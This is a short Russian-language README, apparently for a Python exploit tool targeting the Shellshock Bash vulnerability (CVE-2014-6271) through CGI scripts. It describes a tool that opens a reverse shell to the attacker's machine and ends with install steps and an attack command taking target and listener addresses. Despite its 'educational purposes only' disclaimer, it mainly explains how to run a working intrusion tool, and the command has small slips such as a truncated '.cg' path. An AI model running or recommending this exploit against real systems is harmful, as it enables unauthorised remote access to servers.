
Эксплойт на Python для CVE-2014-6271 (Shellshock), нацеленный на уязвимые CGI-скрипты с обработчиком reverse shell, поддерживающий HTTP/HTTPS, пользовательские пути и прокси.
Это Python-эксплойт для уязвимости Shellshock (CVE-2014-6271), которая затрагивает GNU Bash. Эксплойт нацелен на CGI-скрипты на уязвимых веб-серверах и устанавливает обратную оболочку (reverse shell) на машину атакующего.
CVE-2014-6271
Этот инструмент предназначен только для образовательных и этических целей.
sudo python3 -m pip install pwntools
sudo python3 -m pip install requests
git clone https://github.com/knightc0de/Shellshock_vuln_Exploit.git
cd Shellshock_vuln_Exploit/
chmod +x CVE-2014-6271.py
python3 CVE-2014-6271 --rhost <target_ip> --lhost <your_ip> --lport <your_port> --pages /cgi-bin/test.cg